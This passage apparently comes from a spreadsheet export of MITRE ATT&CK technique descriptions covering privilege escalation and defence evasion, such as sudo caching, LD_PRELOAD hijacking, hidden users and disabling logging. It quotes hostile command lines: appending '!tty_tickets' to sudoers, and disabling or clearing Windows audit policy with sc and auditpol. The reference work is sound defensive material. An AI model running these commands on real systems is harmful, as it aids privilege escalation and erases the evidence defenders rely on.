This behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security context) of the injecting process. However, execution via process doppelgänging may evade detection from security products since the execution is masked under a legitimate process. </t>
  </si>
  <si>
    <t>Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.
Within Linux and MacOS systems, sudo (sometimes referred to as "superuser do") allows users to perform commands from terminals with elevated privileges and to control who can perform these commands on the system. The &lt;code&gt;sudo&lt;/code&gt; command "allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments."(Citation: sudo man page 2018) Since sudo was made for the system administrator, it has some useful configuration features such as a &lt;code&gt;timestamp_timeout&lt;/code&gt;, which is the amount of time in minutes between instances of &lt;code&gt;sudo&lt;/code&gt; before it will re-prompt for a password. This is because &lt;code&gt;sudo&lt;/code&gt; has the ability to cache credentials for a period of time. Sudo creates (or touches) a file at &lt;code&gt;/var/db/sudo&lt;/code&gt; with a timestamp of when sudo was last run to determine this timeout. Additionally, there is a &lt;code&gt;tty_tickets&lt;/code&gt; variable that treats each new tty (terminal session) in isolation. This means that, for example, the sudo timeout of one tty will not affect another tty (you will have to type the password again).
The sudoers file, &lt;code&gt;/etc/sudoers&lt;/code&gt;, describes which users can run which commands and from which terminals. This also describes which commands users can run as other users or groups. This provides the principle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&lt;code&gt;user1 ALL=(ALL) NOPASSWD: ALL&lt;/code&gt;.(Citation: OSX.Dok Malware) Elevated privileges are required to edit this file though.
Adversaries can also abuse poor configurations of these mechanisms to escalate privileges without needing the user's password. For example, &lt;code&gt;/var/db/sudo&lt;/code&gt;'s timestamp can be monitored to see if it falls within the &lt;code&gt;timestamp_timeout&lt;/code&gt; range. If it does, then malware can execute sudo commands without needing to supply the user's password. Additional, if &lt;code&gt;tty_tickets&lt;/code&gt; is disabled, adversaries can do this from any tty for that user.
In the wild, malware has disabled &lt;code&gt;tty_tickets&lt;/code&gt; to potentially make scripting easier by issuing &lt;code&gt;echo \'Defaults !tty_tickets\' &gt;&gt; /etc/sudoers&lt;/code&gt;.(Citation: cybereason osx proton) In order for this change to be reflected, the malware also issued &lt;code&gt;killall Terminal&lt;/code&gt;. As of macOS Sierra, the sudoers file has &lt;code&gt;tty_tickets&lt;/code&gt; enabled by default.</t>
  </si>
  <si>
    <t>Adversaries may modify Group Policy Objects (GPOs) to subvert the intended discretionary access controls for a domain, usually with the intention of escalating privileges on the domain. Group policy allows for centralized management of user and computer settings in Active Directory (AD). GPOs are containers for group policy settings made up of files stored within a predictable network path `\&lt;DOMAIN&gt;\SYSVOL\&lt;DOMAIN&gt;\Policies\`.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016) 
Like other objects in AD, GPOs have access controls associated with them. By default all user accounts in the domain have permission to read GPOs. It is possible to delegate GPO access control permissions, e.g. write access, to specific users or groups in the domain.
Malicious GPO modifications can be used to implement many other malicious behaviors such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001), [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105), [Create Account](https://attack.mitre.org/techniques/T1136), [Service Execution](https://attack.mitre.org/techniques/T1569/002),  and more.(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions)(Citation: Mandiant M Trends 2016)(Citation: Microsoft Hacking Team Breach) Since GPOs can control so many user and machine settings in the AD environment, there are a great number of potential attacks that can stem from this GPO abuse.(Citation: Wald0 Guide to GPOs)
For example, publicly available scripts such as &lt;code&gt;New-GPOImmediateTask&lt;/code&gt; can be leveraged to automate the creation of a malicious [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) by modifying GPO settings, in this case modifying &lt;code&gt;&amp;lt;GPO_PATH&amp;gt;\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml&lt;/code&gt;.(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) In some cases an adversary might modify specific user rights like SeEnableDelegationPrivilege, set in &lt;code&gt;&amp;lt;GPO_PATH&amp;gt;\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf&lt;/code&gt;, to achieve a subtle AD backdoor with complete control of the domain because the user account under the adversary's control would then be able to modify GPOs.(Citation: Harmj0y SeEnableDelegationPrivilege Right)</t>
  </si>
  <si>
    <t>Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.
Adversaries may supply CMSTP.exe with INF files infected with malicious commands. (Citation: Twitter CMSTP Usage Jan 2018) Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010) / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017)  and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass AppLocker and other application control defenses since CMSTP.exe is a legitimate binary that may be signed by Microsoft.
CMSTP.exe can also be abused to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may execute their own malicious payloads by hijacking environment variables the dynamic linker uses to load shared libraries. During the execution preparation phase of a program, the dynamic linker loads specified absolute paths of shared libraries from environment variables and files, such as &lt;code&gt;LD_PRELOAD&lt;/code&gt; on Linux or &lt;code&gt;DYLD_INSERT_LIBRARIES&lt;/code&gt; on macOS. Libraries specified in environment variables are loaded first, taking precedence over system libraries with the same function name.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries)(Citation: Apple Doco Archive Dynamic Libraries) These variables are often used by developers to debug binaries without needing to recompile, deconflict mapped symbols, and implement custom functions without changing the original library.(Citation: Baeldung LD_PRELOAD)
On Linux and macOS, hijacking dynamic linker variables may grant access to the victim process's memory, system/network resources, and possibly elevated privileges. This method may also evade detection from security products since the execution is masked under a legitimate process. Adversaries can set environment variables via the command line using the &lt;code&gt;export&lt;/code&gt; command, &lt;code&gt;setenv&lt;/code&gt; function, or &lt;code&gt;putenv&lt;/code&gt; function. Adversaries can also leverage [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006) to export variables in a shell or set variables programmatically using higher level syntax such Python’s &lt;code&gt;os.environ&lt;/code&gt;.
On Linux, adversaries may set &lt;code&gt;LD_PRELOAD&lt;/code&gt; to point to malicious libraries that match the name of legitimate libraries which are requested by a victim program, causing the operating system to load the adversary's malicious code upon execution of the victim program. &lt;code&gt;LD_PRELOAD&lt;/code&gt; can be set via the environment variable or &lt;code&gt;/etc/ld.so.preload&lt;/code&gt; file.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries) Libraries specified by &lt;code&gt;LD_PRELOAD&lt;/code&gt; are loaded and mapped into memory by &lt;code&gt;dlopen()&lt;/code&gt; and &lt;code&gt;mmap()&lt;/code&gt; respectively.(Citation: Code Injection on Linux and macOS)(Citation: Uninformed Needle) (Citation: Phrack halfdead 1997)(Citation: Brown Exploiting Linkers) 
On macOS this behavior is conceptually the same as on Linux, differing only in how the macOS dynamic libraries (dyld) is implemented at a lower level. Adversaries can set the &lt;code&gt;DYLD_INSERT_LIBRARIES&lt;/code&gt; environment variable to point to malicious libraries containing names of legitimate libraries or functions requested by a victim program.(Citation: TheEvilBit DYLD_INSERT_LIBRARIES)(Citation: Timac DYLD_INSERT_LIBRARIES)(Citation: Gabilondo DYLD_INSERT_LIBRARIES Catalina Bypass) </t>
  </si>
  <si>
    <t>Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings.
Control Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a &lt;code&gt;CPlApplet&lt;/code&gt; function.(Citation: Microsoft Implementing CPL)(Citation: TrendMicro CPL Malware Jan 2014) For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel.(Citation: Microsoft Implementing CPL) Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file.(Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013)
Malicious Control Panel items can be delivered via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns(Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013) or executed as part of multi-stage malware.(Citation: Palo Alto Reaver Nov 2017) Control Panel items, specifically CPL files, may also bypass application and/or file extension allow lists.
Adversaries may also rename malicious DLL files (.dll) with Control Panel file extensions (.cpl) and register them to &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Control Panel\Cpls&lt;/code&gt;. Even when these registered DLLs do not comply with the CPL file specification and do not export &lt;code&gt;CPlApplet&lt;/code&gt; functions, they are loaded and executed through its &lt;code&gt;DllEntryPoint&lt;/code&gt; when Control Panel is executed. CPL files not exporting &lt;code&gt;CPlApplet&lt;/code&gt; are not directly executable.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the &lt;code&gt;New-InboxRule&lt;/code&gt; or &lt;code&gt;Set-InboxRule&lt;/code&gt; [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule)
Adversaries may utilize email rules within a compromised user's mailbox to delete and/or move emails to less noticeable folders. Adversaries may do this to hide security alerts, C2 communication, or responses to [Internal Spearphishing](https://attack.mitre.org/techniques/T1534) emails sent from the compromised account.
Any user or administrator within the organization (or adversary with valid credentials) may be able to create rules to automatically move or delete emails. These rules can be abused to impair/delay detection had the email content been immediately seen by a user or defender. Malicious rules commonly filter out emails based on key words (such as &lt;code&gt;malware&lt;/code&gt;, &lt;code&gt;suspicious&lt;/code&gt;, &lt;code&gt;phish&lt;/code&gt;, and &lt;code&gt;hack&lt;/code&gt;) found in message bodies and subject lines. (Citation: Microsoft Cloud App Security)
In some environments, administrators may be able to enable email rules that operate organization-wide rather than on individual inboxes. For example, Microsoft Exchange supports transport rules that evaluate all mail an organization receives against user-specified conditions, then performs a user-specified action on mail that adheres to those conditions.(Citation: Microsoft Mail Flow Rules 2023) Adversaries that abuse such features may be able to automatically modify or delete all emails related to specific topics (such as internal security incident notifications).</t>
  </si>
  <si>
    <t>Adversaries may use a hidden file system to conceal malicious activity from users and security tools. File systems provide a structure to store and access data from physical storage. Typically, a user engages with a file system through applications that allow them to access files and directories, which are an abstraction from their physical location (ex: disk sector). Standard file systems include FAT, NTFS, ext4, and APFS. File systems can also contain other structures, such as the Volume Boot Record (VBR) and Master File Table (MFT) in NTFS.(Citation: MalwareTech VFS Nov 2014)
Adversaries may use their own abstracted file system, separate from the standard file system present on the infected system. In doing so, adversaries can hide the presence of malicious components and file input/output from security tools. Hidden file systems, sometimes referred to as virtual file systems, can be implemented in numerous ways. One implementation would be to store a file system in reserved disk space unused by disk structures or standard file system partitions.(Citation: MalwareTech VFS Nov 2014)(Citation: FireEye Bootkits) Another implementation could be for an adversary to drop their own portable partition image as a file on top of the standard file system.(Citation: ESET ComRAT May 2020) Adversaries may also fragment files across the existing file system structure in non-standard ways.(Citation: Kaspersky Equation QA)</t>
  </si>
  <si>
    <t>Adversaries may set files and directories to be hidden to evade detection mechanisms. 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
On Linux and Mac, users can mark specific files as hidden simply by putting a “.” as the first character in the file or folder name  (Citation: Sofacy Komplex Trojan) (Citation: Antiquated Mac Malware). Files and folders that start with a period, ‘.’, are by default hidden from being viewed in the Finder application and standard command-line utilities like “ls”. Users must specifically change settings to have these files viewable.
Files on macOS can also be marked with the UF_HIDDEN flag which prevents them from being seen in Finder.app, but still allows them to be seen in Terminal.app (Citation: WireLurker). On Windows, users can mark specific files as hidden by using the attrib.exe binary. Many applications create these hidden files and folders to store information so that it doesn’t clutter up the user’s workspace. For example, SSH utilities create a .ssh folder that’s hidden and contains the user’s known hosts and keys.
Adversaries can use this to their advantage to hide files and folders anywhere on the system and evading a typical user or system analysis that does not incorporate investigation of hidden files.</t>
  </si>
  <si>
    <t>Adversaries may use hidden users to hide the presence of user accounts they create or modify. Administrators may want to hide users when there are many user accounts on a given system or if they want to hide their administrative or other management accounts from other users. 
In macOS, adversaries can create or modify a user to be hidden through manipulating plist files, folder attributes, and user attributes. To prevent a user from being shown on the login screen and in System Preferences, adversaries can set the userID to be under 500 and set the key value &lt;code&gt;Hide500Users&lt;/code&gt; to &lt;code&gt;TRUE&lt;/code&gt; in the &lt;code&gt;/Library/Preferences/com.apple.loginwindow&lt;/code&gt; plist file.(Citation: Cybereason OSX Pirrit) Every user has a userID associated with it. When the &lt;code&gt;Hide500Users&lt;/code&gt; key value is set to &lt;code&gt;TRUE&lt;/code&gt;, users with a userID under 500 do not appear on the login screen and in System Preferences. Using the command line, adversaries can use the &lt;code&gt;dscl&lt;/code&gt; utility to create hidden user accounts by setting the &lt;code&gt;IsHidden&lt;/code&gt; attribute to &lt;code&gt;1&lt;/code&gt;. Adversaries can also hide a user’s home folder by changing the &lt;code&gt;chflags&lt;/code&gt; to hidden.(Citation: Apple Support Hide a User Account) 
Adversaries may similarly hide user accounts in Windows. Adversaries can set the &lt;code&gt;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList&lt;/code&gt; Registry key value to &lt;code&gt;0&lt;/code&gt; for a specific user to prevent that user from being listed on the logon screen.(Citation: FireEye SMOKEDHAM June 2021)(Citation: US-CERT TA18-074A)
On Linux systems, adversaries may hide user accounts from the login screen, also referred to as the greeter. The method an adversary may use depends on which Display Manager the distribution is currently using. For example, on an Ubuntu system using the GNOME Display Manger (GDM), accounts may be hidden from the greeter using the &lt;code&gt;gsettings&lt;/code&gt; command (ex: &lt;code&gt;sudo -u gdm gsettings set org.gnome.login-screen disable-user-list true&lt;/code&gt;).(Citation: Hide GDM User Accounts) Display Managers are not anchored to specific distributions and may be changed by a user or adversary.</t>
  </si>
  <si>
    <t>Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden. This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks. 
On Windows, there are a variety of features in scripting languages in Windows, such as [PowerShell](https://attack.mitre.org/techniques/T1059/001), Jscript, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005) to make windows hidden. One example of this is &lt;code&gt;powershell.exe -WindowStyle Hidden&lt;/code&gt;. (Citation: PowerShell About 2019)
Similarly, on macOS the configurations for how applications run are listed in property list (plist) files. One of the tags in these files can be &lt;code&gt;apple.awt.UIElement&lt;/code&gt;, which allows for Java applications to prevent the application's icon from appearing in the Dock. A common use for this is when applications run in the system tray, but don't also want to show up in the Dock.
Adversaries may abuse these functionalities to hide otherwise visible windows from users so as not to alert the user to adversary activity on the system.(Citation: Antiquated Mac Malware)</t>
  </si>
  <si>
    <t>Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional services after a safe mode boot.(Citation: Microsoft Safe Mode)(Citation: Sophos Snatch Ransomware 2019)
Adversaries may abuse safe mode to disable endpoint defenses that may not start with a limited boot. Hosts can be forced into safe mode after the next reboot via modifications to Boot Configuration Data (BCD) stores, which are files that manage boot application settings.(Citation: Microsoft bcdedit 2021)
Adversaries may also add their malicious applications to the list of minimal services that start in safe mode by modifying relevant Registry values (i.e. [Modify Registry](https://attack.mitre.org/techniques/T1112)). Malicious [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) objects may also be registered and loaded in safe mode.(Citation: Sophos Snatch Ransomware 2019)(Citation: CyberArk Labs Safe Mode 2016)(Citation: Cybereason Nocturnus MedusaLocker 2020)(Citation: BleepingComputer REvil 2021)</t>
  </si>
  <si>
    <t>Adversaries may evade defensive mechanisms by executing commands that hide from process interrupt signals. Many operating systems use signals to deliver messages to control process behavior. Command interpreters often include specific commands/flags that ignore errors and other hangups, such as when the user of the active session logs off.(Citation: Linux Signal Man)  These interrupt signals may also be used by defensive tools and/or analysts to pause or terminate specified running processes. 
Adversaries may invoke processes using `nohup`, [PowerShell](https://attack.mitre.org/techniques/T1059/001) `-ErrorAction SilentlyContinue`, or similar commands that may be immune to hangups.(Citation: nohup Linux Man)(Citation: Microsoft PowerShell SilentlyContinue) This may enable malicious commands and malware to continue execution through system events that would otherwise terminate its execution, such as users logging off or the termination of its C2 network connection.
Hiding from process interrupt signals may allow malware to continue execution, but unlike [Trap](https://attack.mitre.org/techniques/T1546/005) this does not establish [Persistence](https://attack.mitre.org/tactics/TA0003) since the process will not be re-invoked once actually terminated.</t>
  </si>
  <si>
    <t>Adversaries may attempt to hide process command-line arguments by overwriting process memory. Process command-line arguments are stored in the process environment block (PEB), a data structure used by Windows to store various information about/used by a process. The PEB includes the process command-line arguments that are referenced when executing the process. When a process is created, defensive tools/sensors that monitor process creations may retrieve the process arguments from the PEB.(Citation: Microsoft PEB 2021)(Citation: Xpn Argue Like Cobalt 2019)
Adversaries may manipulate a process PEB to evade defenses. For example, [Process Hollowing](https://attack.mitre.org/techniques/T1055/012) can be abused to spawn a process in a suspended state with benign arguments. After the process is spawned and the PEB is initialized (and process information is potentially logged by tools/sensors), adversaries may override the PEB to modify the command-line arguments (ex: using the [Native API](https://attack.mitre.org/techniques/T1106) &lt;code&gt;WriteProcessMemory()&lt;/code&gt; function) then resume process execution with malicious arguments.(Citation: Cobalt Strike Arguments 2019)(Citation: Xpn Argue Like Cobalt 2019)(Citation: Nviso Spoof Command Line 2020)
Adversaries may also execute a process with malicious command-line arguments then patch the memory with benign arguments that may bypass subsequent process memory analysis.(Citation: FireEye FiveHands April 2021)
This behavior may also be combined with other tricks (such as [Parent PID Spoofing](https://attack.mitre.org/techniques/T1134/004)) to manipulate or further evade process-based detections.</t>
  </si>
  <si>
    <t>Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.(Citation: macOS Hierarchical File System Overview) Usage of a resource fork is identifiable when displaying a file’s extended attributes, using &lt;code&gt;ls -l@&lt;/code&gt; or &lt;code&gt;xattr -l&lt;/code&gt; commands. Resource forks have been deprecated and replaced with the application bundle structure. Non-localized resources are placed at the top level directory of an application bundle, while localized resources are placed in the &lt;code&gt;/Resources&lt;/code&gt; folder.(Citation: Resource and Data Forks)(Citation: ELC Extended Attributes)
Adversaries can use resource forks to hide malicious data that may otherwise be stored directly in files. Adversaries can execute content with an attached resource fork, at a specified offset, that is moved to an executable location then invoked. Resource fork content may also be obfuscated/encrypted until execution.(Citation: sentinellabs resource named fork 2020)(Citation: tau bundlore erika noerenberg 2020)</t>
  </si>
  <si>
    <t>Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment. By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance. Additionally, depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values.(Citation: SingHealth Breach Jan 2019)
Adversaries may utilize native support for virtualization (ex: Hyper-V) or drop the necessary files to run a virtual instance (ex: VirtualBox binaries). After running a virtual instance, adversaries may create a shared folder between the guest and host with permissions that enable the virtual instance to interact with the host file system.(Citation: Sophos Ragnar May 2020)</t>
  </si>
  <si>
    <t>Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code with benign data.(Citation: FireEye VBA stomp Feb 2020)
MS Office documents with embedded VBA content store source code inside of module streams. Each module stream has a &lt;code&gt;PerformanceCache&lt;/code&gt; that stores a separate compiled version of the VBA source code known as p-code. The p-code is executed when the MS Office version specified in the &lt;code&gt;_VBA_PROJECT&lt;/code&gt; stream (which contains the version-dependent description of the VBA project) matches the version of the host MS Office application.(Citation: Evil Clippy May 2019)(Citation: Microsoft _VBA_PROJECT Stream)
An adversary may hide malicious VBA code by overwriting the VBA source code location with zero’s, benign code, or random bytes while leaving the previously compiled malicious p-code. Tools that scan for malicious VBA source code may be bypassed as the unwanted code is hidden in the compiled p-code. If the VBA source code is removed, some tools might even think that there are no macros present. If there is a version match between the &lt;code&gt;_VBA_PROJECT&lt;/code&gt; stream and host MS Office application, the p-code will be executed, otherwise the benign VBA source code will be decompressed and recompiled to p-code, thus removing malicious p-code and potentially bypassing dynamic analysis.(Citation: Walmart Roberts Oct 2018)(Citation: FireEye VBA stomp Feb 2020)(Citation: pcodedmp Bontchev)</t>
  </si>
  <si>
    <t>Adversaries may disable Windows event logging to limit data that can be leveraged for detections and audits. Windows event logs record user and system activity such as login attempts, process creation, and much more.(Citation: Windows Log Events) This data is used by security tools and analysts to generate detections.
The EventLog service maintains event logs from various system components and applications.(Citation: EventLog_Core_Technologies) By default, the service automatically starts when a system powers on. An audit policy, maintained by the Local Security Policy (secpol.msc), defines which system events the EventLog service logs. Security audit policy settings can be changed by running secpol.msc, then navigating to &lt;code&gt;Security Settings\Local Policies\Audit Policy&lt;/code&gt; for basic audit policy settings or &lt;code&gt;Security Settings\Advanced Audit Policy Configuration&lt;/code&gt; for advanced audit policy settings.(Citation: Audit_Policy_Microsoft)(Citation: Advanced_sec_audit_policy_settings) &lt;code&gt;auditpol.exe&lt;/code&gt; may also be used to set audit policies.(Citation: auditpol)
Adversaries may target system-wide logging or just that of a particular application. For example, the Windows EventLog service may be disabled using the &lt;code&gt;Set-Service -Name EventLog -Status Stopped&lt;/code&gt; or &lt;code&gt;sc config eventlog start=disabled&lt;/code&gt; commands (followed by manually stopping the service using &lt;code&gt;Stop-Service  -Name EventLog&lt;/code&gt;).(Citation: Disable_Win_Event_Logging)(Citation: disable_win_evt_logging) Additionally, the service may be disabled by modifying the “Start” value in &lt;code&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog&lt;/code&gt; then restarting the system for the change to take effect.(Citation: disable_win_evt_logging)
There are several ways to disable the EventLog service via registry key modification. First, without Administrator privileges, adversaries may modify the "Start" value in the key &lt;code&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-Security&lt;/code&gt;, then reboot the system to disable the Security EventLog.(Citation: winser19_file_overwrite_bug_twitter) Second, with Administrator privilege, adversaries may modify the same values in &lt;code&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System&lt;/code&gt; and &lt;code&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-Application&lt;/code&gt; to disable the entire EventLog.(Citation: disable_win_evt_logging)
Additionally, adversaries may use &lt;code&gt;auditpol&lt;/code&gt; and its sub-commands in a command prompt to disable auditing or clear the audit policy. To enable or disable a specified setting or audit category, adversaries may use the &lt;code&gt;/success&lt;/code&gt; or &lt;code&gt;/failure&lt;/code&gt; parameters. For example, &lt;code&gt;auditpol /set /category:”Account Logon” /success:disable /failure:disable&lt;/code&gt; turns off auditing for the Account Logon category.(Citation: auditpol.exe_STRONTIC)(Citation: T1562.002_redcanaryco) To clear the audit policy, adversaries may run the following lines: &lt;code&gt;auditpol /clear /y&lt;/code&gt; or &lt;code&gt;auditpol /remove /allusers&lt;/code&gt;.(Citation: T1562.002_redcanaryco)
By disabling Windows event logging, adversaries can operate while leaving less evidence of a compromise behind.</t>
  </si>
  <si>
    <t>Adversaries may disable or modify a firewall within a cloud environment to bypass controls that limit access to cloud resources. Cloud firewalls are separate from system firewalls that are described in [Disable or Modify System Firewall](https://attack.mitre.org/techniques/T1562/004). 
Cloud environments typically utilize restrictive security groups and firewall rules that only allow network activity from trusted IP addresses via expected ports and protocols. An adversary may introduce new firewall rules or policies to allow access into a victim cloud environment. For example, an adversary may use a script or utility that creates new ingress rules in existing security groups to allow any TCP/IP connectivity, or remove networking limitations to support traffic associated with malicious activity (such as cryptomining).(Citation: Expel IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)
Modifying or disabling a cloud firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed.</t>
  </si>
  <si>
    <t>An adversary may disable or modify cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an adversary has sufficient permissions, they can disable or modify logging to avoid detection of their activities.
For example, in AWS an adversary may disable CloudWatch/CloudTrail integrations prior to conducting further malicious activity.(Citation: Following the CloudTrail: Generating strong AWS security signals with Sumo Logic) They may alternatively tamper with logging functionality – for example, by removing any associated SNS topics, disabling multi-region logging, or disabling settings that validate and/or encrypt log files.(Citation: AWS Update Trail)(Citation: Pacu Detection Disruption Module) In Office 365, an adversary may disable logging on mail collection activities for specific users by using the `Set-MailboxAuditBypassAssociation` cmdlet, by disabling M365 Advanced Auditing for the user, or by downgrading the user’s license from an Enterprise E5 to an Enterprise E3 license.(Citation: Dark Reading Microsoft 365 Attacks 2021)</t>
  </si>
  <si>
    <t>Adversaries may disable or modify the Linux audit system to hide malicious activity and avoid detection. Linux admins use the Linux Audit system to track security-relevant information on a system. The Linux Audit system operates at the kernel-level and maintains event logs on application and system activity such as process, network, file, and login events based on pre-configured rules.
Often referred to as `auditd`, this is the name of the daemon used to write events to disk and is governed by the parameters set in the `audit.conf` configuration file. Two primary ways to configure the log generation rules are through the command line `auditctl` utility and the file `/etc/audit/audit.rules`,  containing a sequence of `auditctl` commands loaded at boot time.(Citation: Red Hat System Auditing)(Citation: IzyKnows auditd threat detection 2022)
With root privileges, adversaries may be able to ensure their activity is not logged through disabling the Audit system service, editing the configuration/rule files, or by hooking the Audit system library functions. Using the command line, adversaries can disable the Audit system service through killing processes associated with `auditd` daemon or use `systemctl` to stop the Audit service. Adversaries can also hook Audit system functions to disable logging or modify the rules contained in the `/etc/audit/audit.rules` or `audit.conf` files to ignore malicious activity.(Citation: Trustwave Honeypot SkidMap 2023)(Citation: ESET Ebury Feb 2014)</t>
  </si>
  <si>
    <t>Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel.
Modifying or disabling a system firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed. For example, adversaries may add a new firewall rule for a well-known protocol (such as RDP) using a non-traditional and potentially less securitized port (i.e. [Non-Standard Port](https://attack.mitre.org/techniques/T1571)).(Citation: change_rdp_port_conti)</t>
  </si>
  <si>
    <t>Adversaries may downgrade or use a version of system features that may be outdated, vulnerable, and/or does not support updated security controls. Downgrade attacks typically take advantage of a system’s backward compatibility to force it into less secure modes of operation. 
Adversaries may downgrade and use various less-secure versions of features of a system, such as [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s or even network protocols that can be abused to enable [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) or [Network Sniffing](https://attack.mitre.org/techniques/T1040).(Citation: Praetorian TLS Downgrade Attack 2014) For example, [PowerShell](https://attack.mitre.org/techniques/T1059/001) versions 5+ includes Script Block Logging (SBL) which can record executed script content. However, adversaries may attempt to execute a previous version of PowerShell that does not support SBL with the intent to [Impair Defenses](https://attack.mitre.org/techniques/T1562) while running malicious scripts that may have otherwise been detected.(Citation: CrowdStrike BGH Ransomware 2021)(Citation: Mandiant BYOL 2018)(Citation: att_def_ps_logging)
Adversaries may similarly target network traffic to downgrade from an encrypted HTTPS connection to an unsecured HTTP connection that exposes network data in clear text.(Citation: Targeted SSL Stripping Attacks Are Real)(Citation: Crowdstrike Downgrade)</t>
  </si>
  <si>
    <t>Adversaries disable a network device’s dedicated hardware encryption, which may enable them to leverage weaknesses in software encryption in order to reduce the effort involved in collecting, manipulating, and exfiltrating transmitted data.
Many network devices such as routers, switches, and firewalls, perform encryption on network traffic to secure transmission across networks. Often, these devices are equipped with special, dedicated encryption hardware to greatly increase the speed of the encryption process as well as to prevent malicious tampering. When an adversary takes control of such a device, they may disable the dedicated hardware, for example, through use of [Modify System Image](https://attack.mitre.org/techniques/T1601), forcing the use of software to perform encryption on general processors. This is typically used in conjunction with attacks to weaken the strength of the cipher in software (e.g., [Reduce Key Space](https://attack.mitre.org/techniques/T1600/001)). (Citation: Cisco Blog Legacy Device Attacks)</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</si>
  <si>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Windows implements file and directory ACLs as Discretionary Access Control Lists (DACLs).(Citation: Microsoft DACL May 2018) Similar to a standard ACL, DACLs identifies the accounts that are allowed or denied access to a securable object. When an attempt is made to access a securable object, the system checks the access control entries in the DACL in order. If a matching entry is found, access to the object is granted. Otherwise, access is denied.(Citation: Microsoft Access Control Lists May 2018)
